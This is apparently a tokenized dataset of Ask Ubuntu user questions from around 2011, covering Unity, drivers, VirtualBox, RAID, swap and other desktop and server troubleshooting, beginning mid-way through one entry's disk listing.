bytes disk identifier : 0x00038a56 device boot start end blocks id system /dev/sdb1 * 2 269958 244175360 7 hpfs/ntfs /dev/sdb2 269958 539915 244175873 5 extended /dev/sdb5 269958 535292 239993856 83 linux /dev/sdb6 535293 539915 4180992 82 linux swap / solaris disk /dev/sdc : 1299 mb , 1299594240 bytes 40 heads , 62 sectors/track , 1023 cylinders units = cylinders of 2480 * 512 = 1269760 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system
48994	unity `` files & folders '' lens ca n't find anything	recently , the unity `` files & folders '' lens can not find anything i am searching for using the dash . let 's give an example : i want to find a document called `` figure_1.png '' . before this trouble , i could write `` fig '' in the dash and all the documents starting whose name would contain `` fig '' will be displayed in the results . since , yesterday , nothing happens and i just got the three types `` recent '' , `` download '' and `` favorite folders '' populated . even if the document `` figure_1.png '' is present in the `` recent '' subcategorie , typing `` fig '' would n't only restrict the result to this document . it seems that the search motor has been killed somehow . all other lenses behave as expected . i tried to reinstall the unity-places-files application as well as zeitgeist and log-in/log-out without success . also , when i run the command zeitgeist-daemon -- replace in a terminal , this error message appears : error - zeitgeist.extension - failed loading the 'searchengineextension ' extension i do n't know if that might be related to my problem . do you know a way to get back this very important feature ? thanks for your answers .
48999	driver for printer fuji xerox docuprint c3360 ?	i ca n't find any suitable driver for the fuji xerox docuprint c3360 . fuji xerox 's website does not have any debian package nor sources , but it has an rpm package . can i somehow use it on ubuntu ? here is the content of the rpm : ├── etc │ └── cups │ ├── mimefx.convs │ └── mimefx.types └── usr ├── lib │ └── cups │ └── filter │ ├── pdftopdffx │ ├── pdftopjlfx │ └── pstopdffx └── share └── cups └── model └── fujixerox └── en └── fxlinuxprint.ppd those directories exist in ubuntu natty , so i copied all files to the relevant directories , and rebooted . then in unity 's add printer dialog , i added the printer 's ip adress , it could n't find a driver so i selected the ppd manually . now whenever i try to print , the printer starts making noise , but then the job fails saying `` media tray needs to be filled '' . i tried with all trays . the trays have abundant paper . any idea ?
49000	files disappear on ntfs partition	strange things are happening : some files randomly disappear . i use ubuntu to access files ( movies , docs , music ) on another partition ( ntfs ) , which is mounted through ntfs configuration tool . first i noticed that some pdfs are missing from my `` study '' folder , but i thought maybe i deleted them myself . but now two albums are missing from music folder and i 'm sure it 's something wrong with ubuntu . all those files were recently downloaded and modified from ubuntu and moved to ntfs partition . while on windows 7 ( around two years ) i never had this problem before . so how to prevent this problem ? and are there any tools i could use to recover files and check for errors ? thanks .
49001	software center disappeared and system settings does not work	i was cleaning up software in software center that i no longer use and after uninstalling one package the software center disappeared - as well as the system configuration tools , how can i restore the software center and configuration functionality ? salve , stavo facendo un po ' di pulizia tra i software che non mi interessano su software center e dopo avere disistallato uno ubuntu software center ă¨ sparito e le impostazioni di sistema non funzionano . aiuto vi prego ! sono nel panico . come devo fare .
49006	approach to creating an ubuntu appliance	i am using the latest desktop ubuntu narwhal as a redundant load balancer . this setup also needs keepalived and crossroads xr . this works great but now i would like to produce this as an appliance so that it is easy to deploy . what would be the correct way to approach this requirement ?
49009	how to get output of a script/program into a file ?	i am compiling a program using make and want the output of make to be written to a file . i have tried using > operator like make > build_log.txt and using tee command like make | tee build_log.txt but the problem is that some of the ouput goes into the file but rest keeps appearing on the screen . i can simply copy/paste the text from terminal into a file after running make but that is not a solution . so my question is how do i save i.e redirect all the output to file so that it goes into file only without appearing on screen .
49010	my system has a special image and standard images wo n't work ?	how can i install ubuntu 11.04 on my laptop dell latitude e6420 ? i see this at the ubuntu sites the system is available in some regions with a special image of ubuntu pre-installed by the manufacturer . it takes advantage of the hardware features for this system and may include additional software . you should check when buying the system whether this is an option . standard images of ubuntu may not work at all on the system or may not work well , though canonical and computer manufacturers will try to certify the system with future standard releases of ubuntu .
49011	having both ubuntu and opensuse	i currently have opensuse 11.4 and i want to install ubuntu 11.04 . can i install ubuntu without erasing opensuse so that i can use both of them ? if i can , please tell me how .
49019	lot of debconf windows	when i install a program from the software manager , i have a lot of blank debconf windows opening then disappearing . is this normal behaviour or should i report a bug ?
49022	how do i improve my server disk performance	i have an hp microserver running ubuntu 10.04 lts . it 's a low power server with 5 internal drive bays . i use it to backup my remote servers , vpss and local laptops over the network . i want to get the best performance from the disks , but i do n't know if it 's setup optimally , so i 'm looking for some advice . my server runs rsnapshot multiple times a day to backup remote hosts . the actual incremental backup part takes very little time . the significant time is spent doing things like : - /bin/cp -al /srv/rsnapshot/hourly.0 /srv/rsnapshot/hourly.1 which takes about 2 hours . i realise there are a bazillion tiny files in there . $ sudo du -hs hourly.1 659g hourly.1 also when rsnapshot deletes an old backup this can take a long time : - /bin/rm -rf /srv/rsnapshot/daily.6/ which takes about half an hour . my questions are as follows , configuration of server and some io stats are detailed below . i can of course provide more debug info if necessary : - how can i identify where the bottlenecks are ? am i reaching the limits of what 's capable ( io wise ) with this box ? are there any performance tweaks i could make ? should i use a different raid level ? would it make sense to swap two of the internal raid disks ( half of each mirror ) with two 'other halves of the other mirror ' on the external array ? note : i 'm somewhat not inclined to be doing things like compiling my own kernel . ideally i 'd like to stick on 10.04 lts , unless there 's some magic in later versions that makes this all work a lot quicker . internally the server has 1x160gb sata boot disk and 4x2tb disks : - disk /dev/sde : 160.0 gb , 160041885696 bytes disk /dev/sdf : 2000.4 gb , 2000398934016 bytes disk /dev/sdh : 2000.4 gb , 2000398934016 bytes disk /dev/sdi : 2000.4 gb , 2000398934016 bytes disk /dev/sdg : 2000.4 gb , 2000398934016 bytes the four internal 2tb disks are in a software md raid10 setup : - md0 : active raid10 sdg1 [ 3 ] sdh1 [ 0 ] sdi1 [ 2 ] sdf1 [ 1 ] 3907023872 blocks 64k chunks 2 near-copies [ 4/4 ] [ uuuu ] additionally i have an external edge10 drive enclosure which is connected via a pci-e esata card and contains four more drives of 500gb : - disk /dev/sda : 500.1 gb , 500107862016 bytes disk /dev/sdb : 500.1 gb , 500107862016 bytes disk /dev/sdc : 500.1 gb , 500107862016 bytes disk /dev/sdd : 500.1 gb , 500107862016 bytes this is also setup as an md raid10 array md1 : active raid10 sdb1 [ 1 ] sda1 [ 0 ] sdd1 [ 3 ] sdc1 [ 2 ] 976767872 blocks 64k chunks 2 near-copies [ 4/4 ] [ uuuu ] md0 and md1 are combined to make one big lvm . note : i only recently added the external array , so it 's pretty much blank , i do n't think there are any blocks on it right now . this is presented as an lvm volume : - -- - logical volume -- - lv name /dev/data/data vg name data lv uuid amzcgu-sqli-r363-dufx-bcdf-iwlt-znndp8 lv write access read/write lv status available # open 1 lv size 4.54 tib current le 1190134 segments 2 allocation inherit read ahead sectors auto - currently set to 512 block device 251:0 which is formatted as ext4 and mounted as /srv : - /dev/mapper/data-data on /srv type ext4 ( rw ) there 's plenty of free space . /dev/mapper/data-data 4.5t 2.2t 2.1t 51 % /srv other information that might be useful : - $ uname -a linux ubuntuserver 2.6.32-32-server # 62-ubuntu smp wed apr 20 22:07:43 utc 2011 x86_64 gnu/linux . 00:11.0 sata controller : ati technologies inc sb700/sb800 sata controller [ ahci mode ] ( rev 40 ) 02:00.0 raid bus controller : silicon image , inc. sii 3132 serial ata raid ii controller ( rev 01 ) when doing the cp command during rsnapshot i see the following in iostat : - avg-cpu : % user % nice % system % iowait % steal % idle 0.55 0.00 5.47 66.14 0.00 27.85 device : rrqm/s wrqm/s r/s w/s rsec/s wsec/s avgrq-sz avgqu-sz await svctm % util sda 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 sdb 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 sdc 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 sdd 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 sde 0.00 0.00 0.10 0.00 0.80 0.00 8.00 0.00 0.00 0.00 0.00 sdf 0.00 407.50 0.00 66.80 0.00 3790.40 56.74 124.86 1524.88 13.55 90.50 sdh 0.00 406.90 0.00 66.90 0.00 3790.40 56.66 92.89 1230.52 13.21 88.40 sdi 0.00 407.80 5.50 70.20 44.00 3824.00 51.10 113.83 1333.84 12.34 93.40 sdg 0.00 406.80 6.10 71.60 48.80 3827.20 49.88 64.32 787.68 11.69 90.80 md0 0.00 0.00 11.50 1484.60 92.00 11876.80 8.00 0.00 0.00 0.00 0.00 dm-0 0.00 0.00 11.50 1484.70 92.00 11877.60 8.00 5331.18 471.91 0.63 94.70 md1 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 so basically lots of writes , plenty of io wait . so right now the box is idle , i have suspended all jobs . avg-cpu : % user % nice % system % iowait % steal % idle 0.00 0.00 0.00 0.00 0.00 100.00 device : rrqm/s wrqm/s r/s w/s rsec/s wsec/s avgrq-sz avgqu-sz await svctm % util sda 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 sdb 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 sdc 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 sdd 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 sde 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 sdf 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 sdh 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 sdi 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 sdg 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 md0 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 md1 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 dm-0 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 looks peachy ! $ sudo hdparm -t -t /dev/sd [ a-i ] /dev/sda : timing cached reads : 2532 mb in 2.00 seconds = 1265.95 mb/sec timing buffered disk reads : 270 mb in 3.02 seconds = 89.53 mb/sec /dev/sdb : timing cached reads : 2516 mb in 2.00 seconds = 1258.07 mb/sec timing buffered disk reads : 264 mb in 3.02 seconds = 87.37 mb/sec /dev/sdc : timing cached reads : 2442 mb in 2.00 seconds = 1220.80 mb/sec timing buffered disk reads : 272 mb in 3.00 seconds = 90.60 mb/sec /dev/sdd : timing cached reads : 2520 mb in 2.00 seconds = 1259.64 mb/sec timing buffered disk reads : 272 mb in 3.02 seconds = 90.07 mb/sec /dev/sde : timing cached reads : 2524 mb in 2.00 seconds = 1261.48 mb/sec timing buffered disk reads : 306 mb in 3.01 seconds = 101.56 mb/sec /dev/sdf : timing cached reads : 2366 mb in 2.00 seconds = 1183.28 mb/sec timing buffered disk reads : 388 mb in 3.01 seconds = 128.88 mb/sec /dev/sdg : timing cached reads : 2536 mb in 2.00 seconds = 1267.52 mb/sec timing buffered disk reads : 400 mb in 3.00 seconds = 133.12 mb/sec /dev/sdh : timing cached reads : 2538 mb in 2.00 seconds = 1269.08 mb/sec timing buffered disk reads : 426 mb in 3.00 seconds = 141.90 mb/sec /dev/sdi : timing cached reads : 2538 mb in 2.00 seconds = 1268.57 mb/sec timing buffered disk reads : 402 mb in 3.01 seconds = 133.69 mb/sec
49024	how do i determine the path to a binary of a process ?	is there a way to find out the directory/disk location a process was started from ? i am aware of the /proc mount but not really where to look inside of it .
49025	any way to downgrade ubuntu one recent updates ?	im running the ubuntu one nightlies ppa on my 10.10 meerkat installation . it works great on my home desktop and on my laptop , but at work i did an update the other day that updated the ubuntu one packages and now u1 no longer works on my work computer . any way to downgrade , roll back , or fix this ? here are the files that my home system is trying to update ( if it helps any ) ... im not updating these since u1 works fine at home ! : )
49026	root mode , sound drivers disabled	i noticed that when logged as `` root '' the sound drivers are disabled , or unable to start . while under normal user they are available . how do i activate them ?
49033	controlling volume level & playback with logitech revolution mx mouse buttons	on windows , i use the extra buttons of the logitech revolution mx to play/pause media playback , and to control volume ( level up/down and mute/unmute . ) i can not seem to find a way to reproduce this behaviour in ubuntu 11.04 . specifically i use the thumb wheel to control volume , and the search button to play/pause music . the thumb wheel seems to have no function , but some applications register it as a click . the search button launches 'search for files ' . is it possible to re-map these settings ?
49034	how to print a single image full-page ?	i have an image/photo and want to print it as large as possible , from margin to margin , scaled but keeping the same ratio for x and y , so that the image is not distorted . i tried gnome-photo-printer , but it requires me to calculate the layout : 21x29.7 minus the 1cm margin so 19x27.7 , but even though it complains so i have to trick and enter 18.9x27.6 instead before it works . another solution is to fire up openoffice writer , and manually resize and drag the image inside a page . any more reliable/convenient solution ?
49037	can not install gnome activity journal	when i try to install gaj on my machine from the ppa i am presented with the following error : aptdaemon : depends : python-aptdaemon ( = 0.31+bzr506-0ubuntu6.1 ) but 0.41+bzr646-0ubuntu2 is to be installed gnome-activity-journal : depends : python-gnome2 but it is not going to be installed update-notifier : depends : update-manager-gnome but it is not installable or update-manager but it is not going to be installed recommends : apport-gtk but it is not going to be installed recommends : software-properties-gtk but it is not going to be installed recommends : anacron but it is not going to be installed e : broken packages when i attempt to resolve the package dependencies it want 's to uninstall approximately 1100 packages or the bulk of my running applications . i had no problems using gaj in 10.10 but this is the first time trying it in 11.04 and i can not seem to figure out what i 'm doing wrong .
49040	apt `` could not find a distribution template '' error	when i attempt to install anything using apt-get i get the following error : traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 60 , in < module > sp = softwareproperties ( ) file `` /usr/lib/python2.6/dist-packages/softwareproperties/softwareproperties.py '' , line 90 , in __init__ self.reload_sourceslist ( ) file `` /usr/lib/python2.6/dist-packages/softwareproperties/softwareproperties.py '' , line 538 , in reload_sourceslist self.distro.get_sources ( self.sourceslist ) file `` /usr/lib/python2.6/dist-packages/aptsources/distro.py '' , line 90 , in get_sources raise nodistrotemplateexception ( `` error : could not find a `` aptsources.distro.nodistrotemplateexception : error : could not find a distribution template any idea what this means and how to resolve it ?
49042	how do i change a specific file type icon in nautilus ?	how can i change a specific file type icon on unity for example .css .php files icon ?
49044	how to fix the fonts in firefox ?	it has only stated today after installing kde 's system settings and configuring it to make kde apps look native . firefox has started using a thinner font . so how do i make it use the default fonts ?
49052	virtualbox installation issues due to missing kernel modules	i have dual systems : windows 7 and ubuntu installed on my machine . now i would like to install virtualbox under ubuntu . when i do sudo apt-get install virtualbox-ose , there is an error : setting up virtualbox-ose ( 4.0.4-dfsg-1ubuntu4 ) ... * stopping virtualbox kernel modules [ ok ] * starting virtualbox kernel modules * no suitable module for running kernel found [ fail ] invoke-rc.d : initscript virtualbox-ose , action `` restart '' failed . then launching virtualbox in a terminal , i got this warning : warning : the character device /dev/vboxdrv does not exist . please install the virtualbox-ose-dkms package and the appropriate headers , most likely linux-headers-generic . you will not be able to start vms until this problem is fixed . then i did `` sudo apt-get install virtualbox-ose-dkms '' and `` sudo apt-get install linux-headers-generic '' , they all told me that the package is already the newest version . to fix the kernel module issue , it seems that i have to install kernel-devel . but i got a problem : root @ ubuntu # yum install kernel-devel setting up install process no package kernel-devel available . nothing to do then i am stuck ... could anyone help me to get rid of this warning , and also get the kernel module loaded ? thank you very much
49059	unable to install virtualbox due to missing kernel module	i am trying to install virtualbox on my ubuntu . i first tried to sudo apt-get install virtualbox-ose in a terminal , but after the configuration step , it fails with an error : no suitable module for running kernel found when proceeding with starting virtualbox , i get this error : warning : the character device /dev/vboxdrv does not exist . please install the virtualbox-ose-dkms package and the appropriate headers , most likely linux-headers-generic . you will not be able to start vms until this problem is fixed . so i tried the package from http : //www.virtualbox.org/ , but starting virtualbox fails with : warning : the vboxdrv kernel module is not loaded . either there is no module available for the current kernel ( 2.6.38-8-generic-pae ) or it failed to load . please recompile the kernel module and install it by sudo /etc/init.d/vboxdrv setup you will not be able to start vms until this problem is fixed . so i ran sudo /etc/init.d/vboxdrv setup , but it fails too : * stopping virtualbox kernel modules [ ok ] * uninstalling old virtualbox dkms kernel modules [ ok ] * trying to register the virtualbox kernel modules using dkms error ! your kernel headers for kernel 2.6.38-8-generic-pae can not be found at /lib/modules/2.6.38-8-generic-pae/build or /lib/modules/2.6.38-8-generic-pae/source . * failed , trying without dkms * recompiling virtualbox kernel modules * look at /var/log/vbox-install.log to find out what went wrong the contents of /var/log/vbox-install.log . as i am stuck , i also tried to install kernel-devel with yum , still fruitless : root @ ubuntu # yum install kernel-devel setting up install process no package kernel-devel available . nothing to do now i 've no idea how to correct this . any ideas ?
49061	how do i use .net on ubuntu server ?	i have been running a webserver on my ubuntu server . now my friend wants me to also run .net on my server . how do i run .net on it ? i have no knowledge about .net though my friend is quite good in it : ) anyways help me . thanks : d
49066	how can i host my own website	i have bought a domain lets say it example.com , i also own an ubuntu 10.04 machine which i would like to use it to serve my personal website . i have deployed the website on my local machine and its set with a static ip address which i can access like http : //xx.xx.xx.xx what i would like to do is connect my domain name example.com so it points to my ip in order to serve the page .
49069	choosing 3g or edge on mobile broadband	i 'm using mobile broadband with the modem huawei k3765 . i have installed the driver from here : http : //www.betavine.net/bvportal/resources/datacards/devices . in the modem 's official management application ( supporting only windows os , not linux ) there is an option for using either an edge or 3g connection , depending on the signal strength . using this option , the modem defaults to 3g . only when the signal is low , it automatically connects via edge . you can suppress this behavior by choosing the option `` connect via 3g only '' . now i 'm using ubuntu 11.04 . as i said i could n't install the official application , i just installed the mentioned driver . this modem automatically connects via edge when 3g signal is low . i want to connect via 3g always , also when the 3g signal is low . so what i should do ?
49073	ubuntuone control panel ca n't change login	where is the config file for the ubuntu one control panel.. cant seem to locate it , and i need to change the account details ... any help appreciated .
49077	how can i turn on unity again	i 'm just a newbie switching to ubuntu for a few day . i accidentally turn off the unity interface in the ccsm ( compiz something i do n't know ) now , my desktop do n't have anything except my computer , home folder , and trash . many ( or all ) shortcut keys are disable . i can only access the internet by going through folders in my computer . and this place is my only last hope before i decide to reinstall it again .
49079	edid , lcd kernel errors appear on boot	when i boot ubuntu , i have these errors before logging in : [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 67 [ drm : drm_edid_block_valid ] *error* raw edid : ... [ drm : radeon_atombios_get_lvds_info ] *error* bad lcd record 217 then i could find more details about them in /var/log/kern.log . does anyone what they mean , and how to amend them ?
49080	issue with trashcan in panel	i am running natty and i have the trashcan applet in one of my panels in gnome and when i drag items to the trash can they get put into the panel instead . i can still put things in the trash can by right-clicking on them and moving them to trash . and i can click the trash can to view the items in it and empty it , but it always shows as full .
49086	how to install windows 7 inside virtualbox of ubuntu ?	i have already dual systems : windows 7 and ubuntu installed on my laptop . the windows 7 had been installed when i bought this laptop , and i do n't have a cd . i just installed vitrualbox under ubuntu , hoping that i could install another windows in this virtual machine , so that i could run some applications of windows even under ubuntu . but it seems that i need a cd or iso of windows to boot inside this virtual machine . otherwise , there is an error : fatal : no bootable medium found ! system halted . my question is where i could find a cd or iso ? at the moment , i am downloading iso from this page , but do not know if it will work . by the way , i am not sure if i should pick the 32-bit or 64-bit ? as my cpu is 64-bit but my ubuntu is i386 . could anyone help ? thank you very much .
49090	devhelp php-doc is not available	i 've been using devhelp but find that it is too much towards python , and gnome development . other documentations ( such as php-doc ) are left out as of now . is there a simple way to add php-doc into devhelp ?
49091	enabling compiz `` extra '' or `` normal '' effects per bash in ubuntu	enabling disabling compiz per bash is pretty simple per compiz -- replace , but how can i switch between the none / normal / extra -- visual effects in the `` gnome-appearance-properties '' only using a shell.. ps . this is for a kiosk mode pc , which will have no mouse/keyboard devices attached ! gnome panel menus and everything is disabled ...
49092	chrome fonts not displaying properly after installing texlive	i installed texlive 2010 and ran fc-cache -fvs to update font cache . after that some fonts are not displaying properly in google chrome . in firefox it is working fine . what could be the problem ?
49093	no app icons in menus	i have enabled icons in menus , and most of them show up well ( folder icons , file icons , save icons , etc. ) . but whenever an app tries to use an icon specific to itself , such as gimp , it replaces that icon with the app icon , so that when i look at a menu in gimp , i see most of the time just icons of gimp 's logo ( that seems to be the only problem ; the text is fine ) . i thought this was proper to gimp , but i also noticed it happening on abiword . thankfully , as i said , it 's not for all icons . but it still bugs me . why is it so ? here is a screenshot of a menu in gimp : i am using ubuntu 11.04 natty narwhal , with unity desktop ( the problem also occurs on the classic desktop , if i remember correctly ) . edit : this does not occur on the classic desktop ; only in unity .
49095	how do i add more swap easily so that i can hibernate my laptop ?	i installed natty on my laptop with default options . i guess it created a swap partition equal to the size of my ram . every time i try to hibernate i get the `` not enough swap '' message , which is annoying . i want to hibernate ! why ca n't you just use some of my 20gb free hd space to hibernate ? i only have 1gb ram on this old geezer . i 've seen the swap faq @ http : //help.ubuntu.com/community/swapfaq but it 's painfully dense . it shows me how to create a swap file and turn that on , but does n't explain the following : will the system hibernate to that swap file , or will it still be confused because the swap partition is there and too small ? do i need to get rid of the swap partition ? i do n't desperately need the space , but i would like to reclaim it because this computer has a pretty small hd . why is this all so difficult ? thanks !
49100	how do i convert .dwg to .dxf with free software ?	how do i convert .dwg to .dxf using free software ( as in freedom ) only ( webapps are ok ) ?
49104	a `` commands '' element appeared in my unity launcher ... what is it ?	as you can see , this blank commands lens is now on my unity launcher , without installing any related software . it launches the run a command dialog ( like alt+f2 ) but it has no icon ... how did it get there ? is it related to recent unity updates ? or maybe to some application ? if so , how can i get rid of it , since there 's no file under /usr/share/unity/places ? thanks for your time !
49109	i have 16gb ram . do i need 32gb swap ?	i read many places that the rule of thumb for swap space is to double the amount of physical ram . however , 32 gb does seem a lot . do i need that much ? do i need it at all with this high amount of physical ram ?
49113	switching between users closes all applications	our home desktop computer ( running ubuntu 11.04 ) is used mainly by two users , my wife and me . we have the screensaver to lock the screen when inactive . now , 60 % of the times when we switch from one user to the other it seems that all the running applications of one user are closed . the procedure is like this : the computer is idle with both users logged in . the screen is blank ( due to inactivity ) i move the mouse to wake the screen . the login window with the user name of my wife appears . i click the `` switch user '' button . the main login window appears ( with both user names ) both usernames contain a green checkbox ( marking that the indicated users are logged in ) i click my name and enter my password . the screen blanks for a few seconds and then the login window ( with the two usernames ) appears again . the green checkbox has been removed from my name . i select my name and enter password , again . login succeeds but all my applications are closed , as if i logged in for the first time . this is getting very annoying because i constantly lose the state of work . chrome also complains that it did n't shut down correctly and if i want the restored the closed tabs . where do i start looking for a possible fix ... ? thanks , stratos
49116	my time and date settings refuse to open ( from the time indicator )	i 'm not sure why , but since an update a few days ago , the time and date settings wo n't open . i would try to trouble shoot this myself , but i do n't know the command for opening those settings offhand . what can i do ?
49118	blocks of applications disappears	i am currently using the latest version of ubuntu with the classic interface . every now and then i get `` holes '' in my running application exposing my background . i do n't quite know how i am supposed to describe the problem , so i 've uploaded a screenshot of what i mean .
49120	black screen on wc3 roc startup	i ran sudo apt-get install playonlinux and then downloaded warcraft iii via the downloader client i 've got on battle.net i installed it and everything went as normal . but when i lunched wc3 for the first time i only got a black screen , i heard sound from a video explaining why it was called roc ( story ) . the screen resolution was set to 800*600 after i launched the program , ( i had to open nvidia-x-server-settings and set it back to normal ( 1355*768 ) ) . info asus 1201n warcraft iii 1.21b roc ubuntu 11.04 64-bit it works great under windows 7 32-bit update i did as roland taylor said and it worked ! i went in to the video settings inside wc3 and set it to 1366*768 and then i disabled the `` emulate desktop '' inside wine . now it works in fullscreen ! awesome , thanks ! now i just hope the same thing works on frozen throne .
49122	edubuntu 11.04 on iso disc not finding my audio hardware nor installing upgrades	i am running edubuntu 11.04 from iso disk and it ca n't find my sound card or cure this by installing updates as i have tried and they wo n't install ! i do n't want to install edubuntu if it it ca n't , or i ca n't , fix the problems ! i am a novice and not sure on all specific tech terms , so if you answer this please go easy on me.. !
49124	how to make firefox use the gnome keyring vault for password storage and retrieval ?	with chrome it is quite simple to use gnome keyring for password storage . but with firefox 4 on ubuntu 11.04 , i do n't know how to achieve this . i remember that firefox 4 supposedly has os integration for this , but can not find the reference anymore . any hints are welcome .
49127	when working in ubuntu it crashes into tty	i am using ubuntu 11.04 with the default unity . i have had it crash into the tty command prompt ( black screen ) from just about any program i am using ( not program specific ) . when it goes into the tty , i can login in and get to a command prompt , but am unable to return to the gui . i am left with no alternative but to use the `` sudo reboot '' command to reboot the hp laptop pavilion dv9000 . any one having this problem ? i 've used 10.04 & 10.10 without any such problem .
49132	how to increase the disk space of ubuntu installed besides windows 7 ?	it is true that there are similar questions in the forum ... but as i installed ubuntu under windows 7 long time ago , i do not remember how i did it or whether i used wubi , which is discussed in many similar questions . so the situation is , i had windows 7 installed on the laptop in the very beginning , then i installed ubuntu so that this is a dual system ( once again , i could not remember how i did it ) . today when i use `` disk usage analyzer '' to scan the disks . it says : total filesystem capacity : 303.2 gb ( used : 162.2 gb available : 141.0 gb ) and the size of root is 161.1 gb whose usage is 100 % . it seems that the files under my windows are all counted in this 161.gb . so now the question is how to make use of the rest 141.0 gb , especially extend ubuntu space with that . could anyone help ? thank you very much . as suggested , here is some images from disk utility : http : //imgur.com/a/cg06s # hgazl and images from disk usage analyzer http : //imgur.com/svpav , the folder under /media is mounted from windows ( so both windows and ubuntu could share it )
49133	are there any hotkeys in dash for choosing among search term matches ?	are there any hotkeys for dash , once a search term has been entered ? for example , if i would like to go to a folder very quickly i would want to press super+f to open the dash and then type the name ... i then must type tab ↓ ↓ so that folders are chosen . then i must hit tab again to get focus on the folder list ! is there a hotkey for this searching only folders for example ?
49137	delete mdadm array but keep data	i have a two-disk mdadm raid1 array . one of the disks has died so the array is in a degraded state . it 's been like this for a while and while i did n't mind getting the occasional email through , recently mdadm had an update that now forces the boot process to halt in an interactive mode where i have to press y to continue or it falls to busybox . very dull . i 'd like to keep the remaining data but i 'd like the drive not to be mdadm-reliant any more . is there a quick way to delete toe md superblocks and mount it directly without losing data ?
49139	disable desktop switching with the scroll wheel in lubuntu ?	i still want to keep my multiple desktops , i want to disable switching desktops with the mouse .
49141	is there a shortcut for places- > search for files in classic mode ?	is there a shortcut for places - > search for files on ubuntu 11.04 ( classic ) ?
49142	alsa mixer applet ?	i have recently installed narwhal . everything seems to look good so far , but as usual sound via pulseaudio is deeply unsatisfactory ; scratchy sound from skype , choppy sound from command line apps , etc . so i 've removed it , and sound now works fine . unfortunately i now discover that the standard gnome mixer applet has changed to being pulseaudio-only , and trying to run it just hangs waiting for a pulseaudio connection . does anyone know of a replacement volume control applet that i could use which manipulates the alsa mixer directly ? i 've found xfce4-volumed , which handles the hotkeys very nicely ( once i disable the keyboard shortcuts in gnome ) , but of course the xfce4 mixer applet is n't compatible with gnome so i ca n't use that ; and there appears to be nothing else readily apparent ...
49143	how do i reset my gdm configuration ?	my friend lent me her laptop and she followed some tutorial on how to switch the wallpaper in gdm2 but it did n't work and now it 's stuck with some wallpaper i ca n't seem to get rid of , how do i reset gdms config ?
49146	why do i have 3 evolution 's in my /usr/share/applications folder ?	i tried to delete one of them , but it wo n't go away .
49147	is there a way to have different wallpaper and different launchers/documents in different workspaces ?	am running 10.10 and want to have a clean workspace , but also one that might be cluttered ( e.g lots of launchers , documents , etc ... ) ... is there a way to do this ( am running compiz )
49149	how to open the `` run application '' dialog from a terminal ?	how can i open a dialog box as below from a terminal ?
49168	gmail offline on firefox 4.0.1 : `` offline mail is not supported by your browser ''	i am using ubuntu 11.04 and its default browser firefox 4.0.1 . a pretty standard configuration , so i am surprised that gmail offline can not be configured and tells me : offline mail is not supported by your browser is it really the case ? or is there something i can do to be able to use gmail offline ?
49174	is there a source insight alternative ?	i am not a developer , but for my work i trace a lot of codes . it is actually rather difficult reading other people 's code , especially for bigger projects . source insight is a great application that stores all the symbols in a data base , so you can see a new function being called , click on it and see how the function is written . you can see all the referrer of a object or jump to a caller . you do n't need to break the train of thought and think up shell commands just to find these things every time you ran into a new variable/structure/function from some other files . i have it running on wine , but there are little glitches that sometimes gets in the way . i know people will mention c-scope , i 've tried it , but it really is n't the same . so , with so many huge open source projects out there for ubuntu , are there native tools to help read them efficiently ? edit : thanks for the suggestions , but does code : :blocks or codelite provide abilities to see the function that the mouse clicked on without jumping to it , so i can see the caller and callee at the same time ?
49175	how do i stop the d key from showing desktop	i have setup my ubuntu box so i can use windows remote desktop to log into it . i was trying to use the terminal and when i tried to type the cd command , it typed the c but the d key minimized the screen . pressing d again brought the window back . open more windows , same effect . it appears that d is triggering the show desktop command . none of my alt , ctrl , or shift keys are pressed . when i do press alt key , it brings up the menu like i expect . when i press shift or caps , i can actually type a capital d. when capslock is on , and i press shift and d , it does the show desktop again . one other note , my password has a lowercase d , so it types correctly until i get into the desktop . i 'm using the ubuntu classic desktop . i 'm new to ubuntu and linux , and i 'm not the most familiar with the configuration settings . what could be causing this ?
49176	jockey not detecting my ati igp xpress 1150	will get to the point , fresh ubuntu 11.04 , i tried to edit the appearance settings for gnome do 0.8.4 , get the error `` you must enable compositing '' help guides suggested to install compiz . installed compiz fine , but none of the visual effects work either . help guides and attempted ati catalyst software i downloaded suggested video card drivers need to be installed . my problem is how to get jockey to see my video card needs drivers or find a manual way of installing the drivers ? os , ubuntu 11.04 video card ati igp xpress 1150 computer , dell inspiron 1501 any help would be much appreciated as this is starting to bug me . if ubuntu 11.04 is not supported possibly going back to ubuntu 10.x might help ?
49179	cheese not working with latest update of gstreamer	one of more needed gstreamer elements are missing : gconfaudiosrc , gconfvideosink . according to the information i found both are part of the gstreamer good plugins 0.10 which synaptic says i have installed . i have cheese 2.32 on ubuntu 10.10
